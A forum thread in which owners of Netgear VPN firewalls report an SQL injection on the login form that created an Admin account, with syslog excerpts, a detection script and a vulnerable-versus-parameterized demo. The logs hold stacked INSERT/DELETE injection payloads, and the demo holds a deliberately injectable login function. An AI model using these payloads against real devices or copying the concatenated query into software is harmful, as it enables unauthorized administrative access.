
laxamar
Aspirant

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hacked on Sep 27th. They seem to have found a SQL password that keeps users in an internal database and injected a new user 'app'. We had SYSLOG to another machine, so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password.


Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'


Model: SRX5308|PROSAFE Gigabit Quad WAN SSL & IPSEC VPN Firewall
Message 1 of 5
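A detection pass over syslog lines in the format quoted above, added here as an example; it is not part of the original post and not Netgear tooling. It assumes the message layout seen in those lines (`<Mon DD HH:MM:SS> <host> LOGIN [System] SSL_<LEVEL> : <text>`). The two benign lines, the host 192.0.2.10 and the `KNOWN_ADMINS` inventory are constructed; the other sample lines are copied from the post, and the INSERT line is left truncated exactly as it appears there. Two signals are raised: a failed login whose "username" contains a quote followed by a SQL keyword, and an Admin login for an account that is not in the inventory or that follows such an attempt within a short window.

```python
import re
from datetime import datetime, timedelta

# Message layout seen in the post (assumption: other models may differ slightly).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) LOGIN \[System\] "
    r"(?P<level>SSL_[A-Z]+)\s*:\s*(?P<msg>.*)$"
)
FAILED_RE = re.compile(r"^Invalid Password for user (?P<user>.+)$")
SUCCESS_RE = re.compile(
    r"^Login Successful for geardomain user (?P<user>[^(]+)\((?P<role>[^)]+)\) from host (?P<ip>\S+)$"
)
# A quote followed by a SQL keyword is not something a person types as a username.
SQLI_RE = re.compile(r"['\"].*\b(insert|delete|update|drop|select|union)\b", re.IGNORECASE)

# Constructed inventory of accounts that are allowed to hold the Admin role.
KNOWN_ADMINS = {"admin"}

# Sample input: two constructed benign lines, then lines copied from the post.
SAMPLE_LOG = [
    "Sep 27 09:02:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user admin",
    "Sep 27 09:02:20 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user admin(Admin) from host 192.0.2.10",
    "Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri",
    "Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64",
    "Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64",
    "Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64",
    "Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'",
]


def parse_ts(ts: str) -> datetime:
    # BSD syslog carries no year; only deltas within one file matter here,
    # so strptime's default year is good enough.
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def analyze(lines, known_admins, window=timedelta(seconds=60)):
    """Return injection-looking failed logins and Admin logins that need review."""
    attempts, suspicious = [], []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a LOGIN line in the expected layout
        ts, msg = parse_ts(m["ts"]), m["msg"]

        failed = FAILED_RE.match(msg)
        if failed and SQLI_RE.search(failed["user"]):
            attempts.append({"ts": ts, "user": failed["user"]})
            continue

        ok = SUCCESS_RE.match(msg)
        if ok:
            reasons = []
            if ok["user"] not in known_admins:
                reasons.append("Admin login for account not in inventory")
            if any(timedelta(0) <= ts - a["ts"] <= window for a in attempts):
                reasons.append("Admin login shortly after SQL-injection attempt")
            if reasons:
                suspicious.append({"ts": ts, "user": ok["user"], "ip": ok["ip"], "reasons": reasons})
    return {"injection_attempts": attempts, "suspicious_logins": suspicious}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG, KNOWN_ADMINS)
    for a in report["injection_attempts"]:
        print(f"{a['ts']:%b %d %H:%M:%S} injection attempt, username={a['user'][:60]!r}...")
    for s in report["suspicious_logins"]:
        print(f"{s['ts']:%b %d %H:%M:%S} user={s['user']} ip={s['ip']}: {'; '.join(s['reasons'])}")
```

On the sample above the two `myxxxx'...` lines are flagged as attempts and both `app(Admin)` logins are flagged for both reasons, while the `admin` lines produce nothing. The account-inventory check is the one worth keeping even after the keyword regex is tuned: an Admin session for a name that was never provisioned is the clearest signal in these logs, and the source IP on the success line is what you carry into the incident record.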
laxamar
Aspirant

Re: Successful hack of our SRX5308

It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

Message 2 of 5
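What "not escaping user input" means in code, as an added illustration that is neither Netgear's firmware nor the device's real query: a toy sqlite3 user table, a login check that splices the credentials into the SQL text and lets stacked statements run, and the parameterized version beside it. The table layout, the two accounts and their passwords are constructed (plaintext only to keep the example short; a real table stores password hashes). The only value taken from the thread is the username shown in the "Invalid Password" log lines.

```python
import sqlite3

# Username exactly as it appears in the post's log lines.
INJECTED_USERNAME = "myxxxx';delete from USERDBUsers where UserName='app';'"


def make_db():
    """Constructed stand-in for the device's user table (two Admin accounts)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE USERDBUsers (UserName TEXT PRIMARY KEY, Password TEXT, UserType TEXT)"
    )
    conn.executemany(
        "INSERT INTO USERDBUsers VALUES (?, ?, ?)",
        [("admin", "correct-horse", "Admin"), ("app", "irrelevant", "Admin")],
    )
    conn.commit()
    return conn


def count_users(conn):
    return conn.execute("SELECT COUNT(*) FROM USERDBUsers").fetchone()[0]


def login_concatenated(conn, username, password):
    """VULNERABLE: credentials are pasted into the SQL text. The toy driver below
    runs every ';'-separated statement and swallows errors, which reproduces the
    behaviour in the logs: the login is reported as a bad password, yet the
    statement hidden in the username has already executed."""
    sql = (
        f"SELECT UserType FROM USERDBUsers WHERE UserName='{username}' "
        f"AND Password='{password}'"
    )
    cur, matched = conn.cursor(), None
    for i, stmt in enumerate(sql.split(";")):
        try:
            cur.execute(stmt)
            if i == 0:
                matched = cur.fetchone()  # only the first statement is the login check
        except sqlite3.Error:
            pass  # trailing fragment is malformed; real code just logs "Invalid Password"
    conn.commit()
    return matched[0] if matched else None


def login_parameterized(conn, username, password):
    """FIXED: the SQL text is a constant and the values are bound as parameters.
    The driver sees exactly one statement, and whatever the username contains
    is compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT UserType FROM USERDBUsers WHERE UserName=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("users before:", count_users(db))
    print("parameterized, injected name ->", login_parameterized(db, INJECTED_USERNAME, "x"))
    print("users after parameterized:", count_users(db))
    print("concatenated, injected name ->", login_concatenated(db, INJECTED_USERNAME, "x"))
    print("users after concatenated:", count_users(db))
```

Both functions reject the injected "username" as a login, which is why the device logged `Invalid Password`; the difference is that the concatenated version has also run the `delete` by the time it says so. Escaping quotes by hand (the `db_escape` mentioned above) closes this particular string, but bound parameters remove the whole class of problem, because the query text never changes with the input.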
jec956613
Tutor

Re: Successful hack of our SRX5308

These have been out of support for a little while now. Sadly, Netgear hasn't seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

Message 3 of 5
tetrawest
Apprentice

Re: Successful hack of our SRX5308

This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500: end of support and firmware upgrades. Sadly, the BR500 is not reliable.

Message 4 of 5
Ricque
Tutor

Re: Successful hack of our SRX5308

Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken.


[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app

Model: FVS318Gv2|ProSafe gigabit 8 port VPN firewall
Message 5 of 5